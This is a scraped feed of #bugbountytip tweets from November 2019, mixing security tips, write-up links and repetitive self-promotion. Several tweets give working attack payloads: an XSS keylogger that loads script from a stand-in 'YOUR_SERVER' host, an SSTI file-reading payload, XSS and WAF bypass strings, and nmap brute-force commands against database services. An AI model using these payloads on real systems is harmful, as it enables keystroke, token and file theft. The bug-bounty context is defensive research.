0 As Defcon 27 videos uploaded to youtube, which talks are must watch for bug bounty hunters? #defcon #bugbounty #bugbountytip #bugbountytips
Ali Tütüncü
@alicanact60


2019-11-20 16:27:34
0 Hi there! I will share a vulnerability which I found on Facebook. PoC video or Write up? Which one do you prefer? The survey will be available for 2 days and then, I will publish it. Select one! #BugBounty #bugbountytips #bugbountytip
Daher Mohamed
@DaherMohamed4


2019-11-20 15:37:46
0 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/uv11CIACuA #BugBounty #bugbountytips #bugbountytip
RIPS Technologies
@ripstech


2019-11-20 15:36:25
2 Find out how Simon found 5 #WordPress core 0days, in our #security whitepaper: ->https://t.co/U7VCsBglqR #bugbounty #bugbountytip #bugbountytips #AppSec https://t.co/fNU3DID063
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:18:12
0 Get Cyber Security and Technology Internship with HACKDOOR Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/KskyHzVwvW
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:10:22
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/u2LdRIokeL
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:08:49
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Bh0bARIGBh
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:06:58
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mCZqeZB8YT
National Cyber Security Services
@NationalCyberS1


2019-11-20 12:40:53
2 Configuring Frida with #BurpSuite and #Genymotion to #bypass #Android #SSL Pinning #LINK :- https://t.co/jLWK2f7dx6 #cybersecurity #Pentesting #pentest #hacking #bugbountytips #bugbounty #bugbountytip https://t.co/JIZt1QUzHi
x1m
@x1m_martijn


2019-11-20 09:23:49
0 Someone else is using my xsshunter payload :p I don't mind heheheh #bugbountytip
Vikash Chaudhary
@OffensiveHunter


2019-11-20 03:49:31
2 #BugBountyTip if you are not getting bounty then hunt these bugs on any program first , you will surely get. it's very easy to hunt these bugs. Regards! #Vikash #Chaudhary CEO & Founder (#HackersEra #Cyber #Security #Consultancy & #Training PVT LTD) mail…https://t.co/NHBnVkBMWH
YogoshaOfficial
@YogoshaOfficial


2019-11-19 16:08:30
10 [#bugbountytip] : If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP ,X-Forwarded-For , X-Remote-IP , X-Remote-Addr @TnMch_
Mantis
@MantisSTS


2019-11-19 15:07:52
2 What word lists do you have most success with to find admin panels? RT for reach! #BugBounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-19 14:11:17
2 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting https://t.co/AjSRBqt57p
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-19 14:00:03
3 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #Pentesting https://t.co/0wdvBhdOHw
bugbountytip
@a_l_e_r_t_1_


2019-11-19 11:16:24
1 Stored XSS on gitlab - 2 #bugbountytips #bugbountytip https://t.co/eaW3avmcpK
Raad Haddad
@raadfhaddad


2019-11-19 07:17:36
2 Read headlines of the company's policies, make sure they implement it correctly, especially when it comes to insecure data storage. I found something related to this in Facebook last year! And yes, i got rewarded for my finding. #bugbountytip #bugbounty #security
_ABDOUL_GAFFHAR_
@mrgaphy


2019-11-19 06:21:42
0 My next open source project I want to make an automated tool that will search leak credentials in log and config files. I always seem to find exposed credentials in log or configuration files. #bugbountytips #BugBounty #bugbountytip #osint #pentest #webappsec #redteam #infosec
void
@gowridash


2019-11-19 04:57:35
0 @facebook Still Notification #bug #defect is not fixed? During shifting Mobile data/Wi-Fi already read/seen posts are showing as new ones #Android9 Is it so difficult to fix this #issue #bugbountytip
tololovejoi
@tolo7010


2019-11-18 23:01:07
0 1% of new bug bounty hunters ask for knowledge, 99% of them ask for motivation #bugbounty #bugbountytip #infosec #hacking
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-11-18 22:35:10
0 #bugbountytip #bugbountytios all of bug hunters writes try to understand web app. Writes some payloads :) But no one write about detection methodology :) Try to understand every vuln and what you need search in response body after sending payload.
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-18 22:14:56
1 Remember that *pht* files can be used to execute PHP code. Old #bugbountytip
m0z
@LooseSecurity


2019-11-18 18:41:49
6 I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountytips #BugBounty #bugbountytip payload not by me
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 18:07:09
0 [Tutorial] My Tutorial collection for SHELLING+ROOTING WEBSITES ----- COMMENT HERE and will share the link ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 17:56:50
0 Hacking Windows PC using Metasploit u TORRENT Tutorial by Hackdoor on WebDav_dll Hijacking https://t.co/yznzTvdCrC Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/OT1MPRtl86
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 17:40:28
1 [[[FREE]]] Biggest Repository of Ebooks (hacking, penetration testing, tool , programming and more) ! Comment Here and I will share the Link with you -- Limited Users only !! #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Halil AHMAD
@Halilahmadd


2019-11-18 11:33:37
0 Second Time Hall Of Fame #BugBounty #XSS #BugBountyTip #infosec https://t.co/Q0WGIKRgpt
HamdiSevben
@HmdSvbn


2019-11-18 11:08:14
0 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/fhokFhyIyj -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/C56oHA2Aua -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/RmE8h4eP6R #bugbountytip #Hacking #redteam
Ali Tütüncü
@alicanact60


2019-11-18 10:34:55
2 Last night, worked about 1 hour and got one triaged report. Waiting payment. @Hacker0x01 #BugBounty #bugbountyips #bugbountytip 1. Always look at all request. Maybe you can find a redirect parameter. 2. This payload can be useful for open redirects: //[email protected] https://t.co/VsUp6O1vCt
Ammar Amer🇸🇾
@cry__pto


2019-11-18 09:54:28
5 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/OOd6Z3Qc1M -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/HoinO16IyM -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/Lz7WTH1mzY #bugbountytip #Hacking #redteam
OCK le Fécond
@OscLFecond


2019-11-18 07:36:58
1 How to Bypass SSL Pinning on Android : -Root your devices -Install your mitm cert -Moove it from data/misc/user/0/cacerts-added -To /system/etc/security/cacerts -No need Frida - Enjoy <3 #AndroidSecurity #MobileSecurity #bugbountytip #bugbountytips
Shantanu Kulkarni
@Iamshantanukul


2019-11-18 05:51:21
0 If a failed login caused application to send a warning email to user , any user data incorporated into the email may need to be checked for SMTP injection attacks. #bugbountytip #hackerone #bugcrowd #bughunting #bugbounty #pentesting #hacking #cybersecurity #bugbountytips
darkmage
@therealdarkmage


2019-11-18 05:35:52
0 Aw fooey, my most recent submission to @Bugcrowd was marked as "duplicate"...meaning it was still a legit concern! Heck yeah, I am learning and leveling up! - It was a open redirect on a website where I overcome a whitelist using a double-redirect 😎 #bugbounty #bugbountytip
Imran nissar
@Imrannissar3


2019-11-18 05:18:49
4 How bash can be used for automation #bugbounty #bugbountytip https://t.co/heUev6rsuI
m0z
@LooseSecurity


2019-11-17 20:46:27
0 Always remember to rest for SSTI (Server-Side Template Injection). Test for it the same way you would for XSS. A few simple payloads like {{7*7}} and if they get replaced by '49' then you've just found a high/critical vulnerability. You need to get a PoC though! #bugbountytip
Halil AHMAD
@Halilahmadd


2019-11-17 20:16:17
5 REMOTE XSS KEYLOGGER Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
ghostlulz
@ghostlulz1337


2019-11-17 18:37:46
7 I always seem to find exposed credentials in log or configuration files. These are easy wins that take 10 seconds to find. More info on my blog: https://t.co/Kft6p37wJM #bugbountytips #BugBounty #bugbountytip #osint #pentest #appsec #redteam #infosec #pentesting #logs #config https://t.co/Vf4AJs2sn7
A hacker's life
@Unknownuser1806


2019-11-17 12:12:55
0 STEALING $10,000 YAHOO COOKIES! https://t.co/PSImiH4oNc JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF: https://t.co/IpzdET7XVb #bugbounty,#bugbountytip,#cybersecurity,#hacking,#infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-17 10:30:09
2 Less than 1$... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AaUIgsgeiM
sagar yadav
@sagaryadav8742


2019-11-17 04:01:58
0 Fun time with @stokfredrik ✌️ and @sechunt3r 😁in #bsidesahmedabad #bugbountytip #bugbounty #bughunting #bugcrowd #cobalt #nullcon #hackerone #Intel #BountyHunter #bounty #secure #zerocopter #happy #sagaryadav8742 https://t.co/vzkOVrKygS
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-17 02:38:05
0 #bugbountytip Always try to access the localStorage when you get an XSS vulnerability. Just managed to retrieve the JWT tokens and user PII information stored on localStorage.
Gillis Jones
@Gillis57


2019-11-17 00:29:13
0 #bugbountytip If you're using a shared environment, and see someone else's injections are messing up the environment for other testers- take the 5 minutes necessary to try to clean up after the other tester that don't respect you enough to do the same.
Ammar Amer🇸🇾
@cry__pto


2019-11-16 23:00:56
6 -1-Recon Everything.pdf: https://t.co/mRJV7fnMQg -2-Open Source Web Reconnaissance with Recon-ng.pdf: https://t.co/V1mV1NNzTB -3-12 OSINT Resources For E-mail Addresses.pdf: https://t.co/EgR3LoHoAm -4-OSINT.pdf: https://t.co/wDNvAWXATu #OSINT #bugbountytip #redteam #Pentesting
tololovejoi
@tolo7010


2019-11-16 20:55:10
3 Bug bounty is not possible if there is no publicly disclosed reports at @Hacker0x01 #bugbounty #bugbountytip #infosec #hacking
healthyoutlet
@healthyoutlet


2019-11-16 19:27:50
0 If you're writing cli tools that people will be using in bash, consider sending all your banners and verbose output to stderr so that the main output can be cleanly piped into other tools. In python you can use sys.stderr.write() #bugbountytip
swordfish
@swordfi96641916


2019-11-16 19:05:46
0 Response: Cannot GET / .. tried all the HTTP Request headers. Any tips on what's next? #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:41:28
0 site:"https://t.co/XdC6eMbugO" pdf -- High level information disclosure !!! User's phone numbers, addresses .... #bugbountytips #bugbountytip https://t.co/7qG4z5s7CZ
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:37:12
1 Less than 1$...(Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/Dq4zebkM4o
Berk Bulan
@berk_bulan


2019-11-16 14:56:09
0 Dns Zone Transfer script #BugBounty #bugbountytip #bugbountytips https://t.co/aKUoARVYQ7
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-16 14:32:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/nbOwGUl1dF
Hussein Daher
@HusseiN98D


2019-11-16 12:42:59
9 To everyone who has been following me, you know I was taking a #bugbounty challenge: 30days $30k Started 20/10. Some bugs still unpaid. I've failed. Still 4 more days to go to complete but I'll be stopping here, I feel really tired. #bugbountytip #bugbountytips #infosec #pentest https://t.co/VRoYeMrxuo
Elsadat
@M0_SADAT


2019-11-16 10:57:28
0 👉🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👈🏿 👉🏿👇🏾👇🏾👇🏾👇🏾👇🏾👇🏾👇🏾👇🏾👇🏾👈🏿 👉🏿👉🏾👇🏽👇🏽👇🏽👇🏽👇🏽👇🏽👇🏽👈🏾👈🏿 👉🏿👉🏾👉🏽👇🏼👇🏼👇🏼👇🏼👇🏼👈🏽👈🏾👈🏿 👉🏿👉🏾👉🏽👉🏼👇🏻👇🏻👇🏻👈🏼👈🏽👈🏾👈🏿 👉🏿👉🏾Read THE JS FILES👈🏽👈🏾👈🏿 👉🏿👉🏾👉🏽👉🏼👆🏻👆🏻👆🏻👈🏼👈🏽👈🏾👈🏿 👉🏿👉🏾👉🏽👆🏼👆🏼👆🏼👆🏼👆🏼👈🏽👈🏾👈🏿 👉🏿👉🏾👆🏽👆🏽👆🏽👆🏽👆🏽👆🏽👆🏽👈🏾👈🏿 👉🏿👆🏾👆🏾👆🏾👆🏾👆🏾👆🏾👆🏾👆🏾👆🏾👈🏿 👉🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👈🏿 #bugbountytip
Zero Xyele
@zeroxyele


2019-11-16 08:19:05
3 Simple Python Script for Host Header Redirection Attack [Multithreaded] https://t.co/LIHgGibs5Z I was awarded 150$ in ten minutes by using that tool 😎 #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101
evryd4y
@evryd4y


2019-11-16 05:56:12
1 Handy for passive enum https://t.co/G8fYKfqLTG #bugbountytip
Ashish Kunwar
@D0rkerDevil


2019-11-16 02:07:43
0 @TakSec Param miner extension can find this. :) #bugbountytip
Gillis Jones
@Gillis57


2019-11-15 23:40:15
0 #bugbountytip If you're using a shared environment with other testers. The rules are very similar to hiking. #leavenotrace- leave the environment like you found it. If you leave damn injections all over the place rendering it unusable, you're an asshole.
Hussein Daher
@HusseiN98D


2019-11-15 20:43:37
2 So today I've found an SQLi in a cookie. Many people only stick to parameters. Test cookies too! #bugbounty #bugbountytips #bugbountytip
Sagar Tanur
@Sagarvd01


2019-11-15 15:50:12
1 Here's a write up of how I could've accessed sensitive PII and private data of tens of thousands of Indians. https://t.co/uby8wggKPx #bugbounty #bugbountytips #BugBountyTip #hacking #infosec #writeup
Halil AHMAD
@Halilahmadd


2019-11-15 15:33:54
0 XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-15 13:55:48
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #bugbountytip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #bugbountytips https://t.co/np0PsJg3GY
Ammar Amer🇸🇾
@cry__pto


2019-11-15 12:38:47
8 -Brute forcing MySQL passwords: nmap -p3306 --script mysql-brute xx.xx.xx.xx -Brute forcing MS SQL passwords: nmap -p1433 --script ms-sql-brute xx.xx.xx.xx -Brute forcing Redis passwords: nmap -p6379 --script redis-brute xx.xx.xx.xx #nmap #hacking #Pentesting #BugBountyTip
Pascal S
@PascalSec


2019-11-15 12:22:39
0 [1/2] #BugBountyTip So this is a pretty basic one but I happen to forget about it over and over again. Before starting a new pentest engagement, clear all your cookies and browser cache. Happened to me many times before that I was asking myself what a specific cookie was for...
Ammar Amer🇸🇾
@cry__pto


2019-11-15 11:51:49
6 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -XSS via HTTP Headers.pdf: https://t.co/jiQJnioGwt -SQL Injection & XSS Playground.pdf: https://t.co/9QZCtkFcx7 -XSS Exploitation in DVWA (Bypass All Security).pdf: https://t.co/dzwO0TwHCF #bugbountytip #xss #Hacking
Elsadat
@M0_SADAT


2019-11-15 10:18:09
2 Finally✌️Acknowledged by @BMW Security Team for 2019 after finding bug in the main domain ;) #bugbountytip ? 1-There is something left for you 2-Always try to Escalate everything you find! 3-NEVER GIVE UP HOF Link:https://t.co/RdsatALn39 (Ahmed Elsadat) #HOF #BugBounty #infosec https://t.co/otgetMsWC0
bugbountytip
@a_l_e_r_t_1_


2019-11-15 08:51:29
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/e5k6XeQeK2
Ammar Amer🇸🇾
@cry__pto


2019-11-15 02:35:29
7 -Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data.pdf: https://t.co/hM7HIZM56f -Pentesting Cheatsheet.pdf: https://t.co/tGxEQsqiQO -Windows Userland Persistence Fundamentals.pdf: https://t.co/uB0pSeXDP3 #PenTest #OSINT #bugbountytip #Hacking #infosec
Ammar Amer🇸🇾
@cry__pto


2019-11-14 23:24:33
4 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -Top GitHub Dorks and Tools: https://t.co/hM7HIZM56f -Pentesting Cheatsheet: https://t.co/zFwYAhCAba -Pentesting Cheatsheet2.pdf: https://t.co/34YEhESX58 -Pentesting Cheatsheets.pdf: https://t.co/tGxEQsqiQO #BugBountyTip
Sagar Tanur
@Sagarvd01


2019-11-14 17:02:57
0 A write up on how I was able to take over 4 tabs in Facebook's own Facebook pages. https://t.co/gmwro4xl5T #bugbounty #bugbountytips #BugBountyTip #writeup @Hacker0x01 @Bugcrowd
yourXss
@yourXss


2019-11-14 16:20:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal…
YogoshaOfficial
@YogoshaOfficial


2019-11-14 13:33:08
7 [#Bugbountytip] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
yourXss
@yourXss


2019-11-14 04:10:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal…
bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 onliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Noman | نعمان | नोमान
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn ®
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer🇸🇾
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming 👁️
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:35:46
5 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ZTpv2Gq4ux
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:32:05
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/fzDOZJDHd6
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:30:38
1 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/jotHFAux1f
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
